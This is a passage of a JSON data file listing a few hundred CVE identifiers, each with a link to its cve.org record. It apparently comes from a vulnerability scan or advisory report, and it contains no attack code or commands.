"name": "CVE-2025-37809",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37809"
},
{
"name": "CVE-2025-40068",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40068"
},
{
"name": "CVE-2025-5245",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5245"
},
{
"name": "CVE-2025-38185",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38185"
},
{
"name": "CVE-2025-39691",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39691"
},
{
"name": "CVE-2025-38406",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38406"
},
{
"name": "CVE-2021-35942",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35942"
},
{
"name": "CVE-2025-40042",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40042"
},
{
"name": "CVE-2025-32415",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32415"
},
{
"name": "CVE-2025-24855",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24855"
},
{
"name": "CVE-2025-37817",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37817"
},
{
"name": "CVE-2025-39890",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39890"
},
{
"name": "CVE-2025-39742",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39742"
},
{
"name": "CVE-2025-5889",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5889"
},
{
"name": "CVE-2025-22102",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22102"
},
{
"name": "CVE-2025-37987",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37987"
},
{
"name": "CVE-2024-23337",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-23337"
},
{
"name": "CVE-2016-0689",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-0689"
},
{
"name": "CVE-2025-37749",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37749"
},
{
"name": "CVE-2026-22695",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22695"
},
{
"name": "CVE-2026-23490",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23490"
},
{
"name": "CVE-2025-11966",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-11966"
},
{
"name": "CVE-2024-36331",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36331"
},
{
"name": "CVE-2025-39748",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39748"
},
{
"name": "CVE-2014-8140",
"url": "https://www.cve.org/CVERecord?id=CVE-2014-8140"
},
{
"name": "CVE-2026-0992",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-0992"
},
{
"name": "CVE-2025-38263",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38263"
},
{
"name": "CVE-2022-47011",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-47011"
},
{
"name": "CVE-2025-38610",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38610"
},
{
"name": "CVE-2025-37772",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37772"
},
{
"name": "CVE-2025-9230",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9230"
},
{
"name": "CVE-2025-38214",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38214"
},
{
"name": "CVE-2025-12194",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-12194"
},
{
"name": "CVE-2021-3549",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3549"
},
{
"name": "CVE-2025-38560",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38560"
},
{
"name": "CVE-2025-37994",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37994"
},
{
"name": "CVE-2025-38551",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38551"
},
{
"name": "CVE-2025-38701",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38701"
},
{
"name": "CVE-2025-38218",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38218"
},
{
"name": "CVE-2025-66564",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66564"
},
{
"name": "CVE-2025-38349",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38349"
},
{
"name": "CVE-2025-5244",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5244"
},
{
"name": "CVE-2021-37972",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-37972"
},
{
"name": "CVE-2025-1352",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1352"
},
{
"name": "CVE-2024-4741",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4741"
},
{
"name": "CVE-2021-33574",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-33574"
},
{
"name": "CVE-2018-1000035",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-1000035"
},
{
"name": "CVE-2025-39726",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39726"
},
{
"name": "CVE-2023-4863",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4863"
},
{
"name": "CVE-2025-48924",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48924"
},
{
"name": "CVE-2025-38393",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38393"
},
{
"name": "CVE-2024-26256",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26256"
},
{
"name": "CVE-2021-3326",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3326"
},
{
"name": "CVE-2021-22926",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-22926"
},
{
"name": "CVE-2025-32414",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32414"
},
{
"name": "CVE-2025-37891",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37891"
},
{
"name": "CVE-2025-38249",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38249"
},
{
"name": "CVE-2025-38716",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38716"
},
{
"name": "CVE-2025-39937",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39937"
},
{
"name": "CVE-2025-37858",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37858"
},
{
"name": "CVE-2023-40403",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-40403"
},
{
"name": "CVE-2025-22013",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22013"
},
{
"name": "CVE-2025-38154",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38154"
},
{
"name": "CVE-2025-38469",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38469"
},
{
"name": "CVE-2025-38581",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38581"
},
{
"name": "CVE-2021-30560",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-30560"
},
{
"name": "CVE-2025-1153",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1153"
},
{
"name": "CVE-2025-62408",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-62408"
},
{
"name": "CVE-2025-40060",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40060"
},
{
"name": "CVE-2026-2003",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-2003"
},
{
"name": "CVE-2025-39790",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39790"
},
{
"name": "CVE-2025-38389",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38389"
},
{
"name": "CVE-2025-38448",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38448"
},
{
"name": "CVE-2022-48281",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48281"
},
{
"name": "CVE-2021-35938",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35938"
},
{
"name": "CVE-2025-15079",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-15079"
},
{
"name": "CVE-2025-37780",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37780"
},
{
"name": "CVE-2025-37995",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37995"
},
{
"name": "CVE-2025-38680",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38680"
},
{
"name": "CVE-2025-37754",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37754"
},
{
"name": "CVE-2025-1632",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1632"
},
{
"name": "CVE-2025-11412",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-11412"
},
{
"name": "CVE-2025-38497",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38497"
},
{
"name": "CVE-2025-23156",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23156"
},
{
"name": "CVE-2025-23157",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23157"
},
{
"name": "CVE-2025-38684",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38684"
},
{
"name": "CVE-2025-38165",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38165"
},
{
"name": "CVE-2022-28321",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-28321"
},
{
"name": "CVE-2025-39686",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39686"
},
{
"name": "CVE-2025-39798",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39798"
},
{
"name": "CVE-2025-38495",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38495"
},
{
"name": "CVE-2025-37808",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37808"
},
{
"name": "CVE-2017-3606",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-3606"
},
{
"name": "CVE-2025-38730",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38730"
},
{
"name": "CVE-2025-38052",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38052"
},
{
"name": "CVE-2025-38377",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38377"
},
{
"name": "CVE-2024-3651",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-3651"
},
{
"name": "CVE-2025-39747",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39747"
},
{
"name": "CVE-2022-40090",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-40090"
},
{
"name": "CVE-2025-68121",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68121"
},
{
"name": "CVE-2023-25434",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-25434"
},
{
"name": "CVE-2024-12243",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12243"
},
{
"name": "CVE-2025-38516",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38516"
},
{
"name": "CVE-2025-38462",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38462"
},
{
"name": "CVE-2025-38428",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38428"
},
{
"name": "CVE-2018-13410",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-13410"
},
{
"name": "CVE-2025-39714",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39714"
},
{
"name": "CVE-2025-38262",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38262"
},
{
"name": "CVE-2025-60876",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-60876"
},
{
"name": "CVE-2025-38138",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38138"
},
{
"name": "CVE-2025-38035",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38035"
},
{
"name": "CVE-2025-14819",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-14819"
},
{
"name": "CVE-2025-37759",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37759"
},
{
"name": "CVE-2025-24928",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24928"
},
{
"name": "CVE-2025-38414",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38414"
},
{
"name": "CVE-2022-35206",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-35206"
},
{
"name": "CVE-2025-0395",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0395"
},
{
"name": "CVE-2025-11065",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-11065"
},
{
"name": "CVE-2025-37933",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37933"
},
{
"name": "CVE-2025-38310",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38310"
},
{
"name": "CVE-2015-4786",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4786"
},
{
"name": "CVE-2025-37886",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37886"
},
{
"name": "CVE-2022-38533",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-38533"
},
{
"name": "CVE-2025-37963",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37963"
},
{
"name": "CVE-2025-40297",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40297"
},
{
"name": "CVE-2026-1484",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-1484"
},
{
"name": "CVE-2022-40304",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-40304"
},
{
"name": "CVE-2025-38226",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38226"
},
{
"name": "CVE-2025-4947",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4947"
},
{
"name": "CVE-2025-39706",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39706"
},
{
"name": "CVE-2025-40178",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40178"
},
{
"name": "CVE-2023-4911",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4911"
},
{
"name": "CVE-2025-38443",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38443"
},
{
"name": "CVE-2025-38576",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38576"
},
{
"name": "CVE-2025-39869",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39869"
},
{
"name": "CVE-2025-0725",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0725"
},
{
"name": "CVE-2025-37800",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37800"
},
{
"name": "CVE-2025-39985",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39985"
},
{
"name": "CVE-2025-61726",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61726"
},
{
"name": "CVE-2023-36660",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-36660"
},
{
"name": "CVE-2025-37900",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37900"
},
{
"name": "CVE-2025-7424",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-7424"
},
{
"name": "CVE-2025-1094",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1094"
},
{
"name": "CVE-2023-25585",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-25585"
},
{
"name": "CVE-2025-38439",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38439"
},
{
"name": "CVE-2025-37805",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37805"
},
{
"name": "CVE-2021-22923",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-22923"
},
{
"name": "CVE-2025-41254",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-41254"
},
{
"name": "CVE-2025-39719",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39719"
},
{
"name": "CVE-2025-37990",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37990"
},
{
"name": "CVE-2020-12762",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-12762"
},
{
"name": "CVE-2025-38553",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38553"
},
{
"name": "CVE-2025-38190",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38190"
},
{
"name": "CVE-2025-3198",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-3198"
},
{
"name": "CVE-2025-38180",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38180"
},
{
"name": "CVE-2025-53864",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53864"
},
{
"name": "CVE-2025-39738",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39738"
},
{
"name": "CVE-2026-2007",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-2007"
},
{
"name": "CVE-2025-38145",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38145"
},
{
"name": "CVE-2023-2953",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2953"
},
{
"name": "CVE-2024-4032",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4032"
},
{
"name": "CVE-2025-37948",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37948"
},
{
"name": "CVE-2021-27645",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-27645"
},
{
"name": "CVE-2025-38166",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38166"
},
{
"name": "CVE-2025-37862",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37862"
},
{
"name": "CVE-2025-38321",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38321"
},
{
"name": "CVE-2024-28835",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28835"
},
{
"name": "CVE-2025-39705",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39705"
},
{
"name": "CVE-2025-37960",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37960"
},
{
"name": "CVE-2025-38045",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38045"
},
{
"name": "CVE-2025-38051",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38051"
},
{
"name": "CVE-2025-59419",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-59419"
},
{
"name": "CVE-2025-49796",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-49796"
},
{
"name": "CVE-2022-34526",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-34526"
},
{
"name": "CVE-2025-8058",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8058"
},
{
"name": "CVE-2025-39713",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39713"
},
{
"name": "CVE-2025-37763",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37763"
},
{
"name": "CVE-2025-11839",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-11839"
},
{
"name": "CVE-2025-37954",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37954"
},
{
"name": "CVE-2024-8244",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-8244"
},
{
"name": "CVE-2025-22128",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22128"
},
{
"name": "CVE-2026-1489",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-1489"
},
{
"name": "CVE-2025-37839",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37839"
},
{
"name": "CVE-2025-39744",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39744"
},
{
"name": "CVE-2025-38277",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38277"
},
{
"name": "CVE-2025-37913",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37913"
},
{
"name": "CVE-2025-39756",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39756"
},
{
"name": "CVE-2025-38539",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38539"
},
{
"name": "CVE-2026-2004",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-2004"
},
{
"name": "CVE-2026-0672",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-0672"
},
{
"name": "CVE-2025-8732",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8732"
},
{
"name": "CVE-2025-38044",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38044"
},
{
"name": "CVE-2022-1586",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1586"
},
{
"name": "CVE-2025-37786",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37786"
},
{
"name": "CVE-2026-0900",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-0900"
},
{
"name": "CVE-2020-16599",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-16599"
},
{
"name": "CVE-2021-46822",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-46822"
},
{
"name": "CVE-2022-45703",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-45703"
},
{
"name": "CVE-2025-38200",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38200"
},
{
"name": "CVE-2025-38480",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38480"
},
{
"name": "CVE-2025-38346",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38346"
},
{
"name": "CVE-2025-30204",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30204"
},
{
"name": "CVE-2025-37959",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37959"
},
{
"name": "CVE-2025-38191",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38191"
},
{
"name": "CVE-2025-39946",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39946"
},
{
"name": "CVE-2025-38062",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38062"
},
{
"name": "CVE-2025-38531",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38531"
},
{
"name": "CVE-2025-5914",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5914"
},
{
"name": "CVE-2023-39804",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39804"
},
{
"name": "CVE-2025-21919",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21919"
},
{
"name": "CVE-2025-39693",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39693"
},
{
"name": "CVE-2025-38503",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38503"
},
{
"name": "CVE-2025-38630",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38630"
},
{
"name": "CVE-2025-38131",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38131"
},
{
"name": "CVE-2023-2908",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2908"
},
{
"name": "CVE-2023-39615",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39615"
},
{
"name": "CVE-2017-7501",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-7501"
},
{
"name": "CVE-2022-47673",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-47673"
},
{
"name": "CVE-2023-31486",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-31486"
},
{
"name": "CVE-2025-39980",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39980"
},
{
"name": "CVE-2021-20197",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-20197"
},
{
"name": "CVE-2023-24056",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-24056"
},
{
"name": "CVE-2026-0902",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-0902"
},
{
"name": "CVE-2013-0340",
"url": "https://www.cve.org/CVERecord?id=CVE-2013-0340"
},
{
"name": "CVE-2025-37851",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37851"
},
{
"name": "CVE-2025-38481",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38481"
},
{
"name": "CVE-2025-38585",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38585"
},
{
"name": "CVE-2023-32611",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-32611"
},
{
"name": "CVE-2024-38816",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38816"
},
{
"name": "CVE-2026-22717",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22717"
},
{
"name": "CVE-2024-34397",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34397"
},
{
"name": "CVE-2025-38320",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38320"
},
{
"name": "CVE-2025-53057",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53057"
},
{
"name": "CVE-2025-1151",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1151"
},
{
"name": "CVE-2025-38625",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38625"
},
{
"name": "CVE-2025-38164",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38164"
},
{
"name": "CVE-2025-8177",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8177"
},
{
"name": "CVE-2025-29480",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-29480"
},
{
"name": "CVE-2025-40346",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40346"
},
{
"name": "CVE-2025-38264",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38264"
},
{
"name": "CVE-2023-1999",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1999"
},
{
"name": "CVE-2020-27618",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-27618"
},
{
"name": "CVE-2025-39676",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39676"
},
{
"name": "CVE-2025-37980",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37980"
},
{
"name": "CVE-2023-0800",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0800"
},
{
"name": "CVE-2025-7546",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-7546"
},
{
"name": "CVE-2025-38280",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38280"
},
{
"name": "CVE-2023-5388",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5388"
},
{
"name": "CVE-2025-1148",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1148"
},
{
"name": "CVE-2025-37788",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37788"
},
{
"name": "CVE-2025-38427",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38427"
},
{
"name": "CVE-2025-38084",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38084"
},
{
"name": "CVE-2022-23219",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-23219"
},
{
"name": "CVE-2015-2640",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-2640"
},
{
"name": "CVE-2025-37879",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37879"
},
{
"name": "CVE-2025-38217",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38217"
},
{
"name": "CVE-2023-5752",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5752"
},
{
"name": "CVE-2025-40030",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40030"
},
{
"name": "CVE-2025-40244",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40244"
},
{
"name": "CVE-2025-66862",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66862"
},
{
"name": "CVE-2025-37881",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37881"
},
{
"name": "CVE-2025-39995",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39995"
},
{
"name": "CVE-2025-38103",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38103"
},
{
"name": "CVE-2025-38514",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38514"
},
{
"name": "CVE-2025-39783",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39783"
},
{
"name": "CVE-2025-39715",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39715"
},
{
"name": "CVE-2025-38569",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38569"
},
{
"name": "CVE-2025-38255",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38255"
},
{
"name": "CVE-2025-38512",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38512"
},
{
"name": "CVE-2023-1579",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1579"
},
{
"name": "CVE-2025-68119",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68119"
},
{
"name": "CVE-2025-38622",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38622"
},
{
"name": "CVE-2021-4217",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-4217"
},
{
"name": "CVE-2023-32643",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-32643"
},
{
"name": "CVE-2025-37909",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37909"
},
{
"name": "CVE-2025-38700",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38700"
},
{
"name": "CVE-2021-43396",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-43396"
},
{
"name": "CVE-2025-37849",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37849"
},
{
"name": "CVE-2025-38162",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38162"
},
{
"name": "CVE-2025-53066",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53066"
},
{
"name": "CVE-2025-22873",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22873"
},
{
"name": "CVE-2025-38532",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38532"
},
{
"name": "CVE-2024-2961",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-2961"
},
{
"name": "CVE-2025-39712",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39712"
},
{
"name": "CVE-2024-12133",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12133"
},
{
"name": "CVE-2025-37812",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37812"
},
{
"name": "CVE-2025-39707",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39707"
},
{
"name": "CVE-2021-22945",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-22945"
},
{
"name": "CVE-2025-37875",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37875"
},
{
"name": "CVE-2025-38410",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38410"
},
{
"name": "CVE-2025-39907",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39907"
},
{
"name": "CVE-2023-42366",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-42366"
},
{
"name": "CVE-2025-39781",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39781"
},
{
"name": "CVE-2025-0167",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0167"
},
{
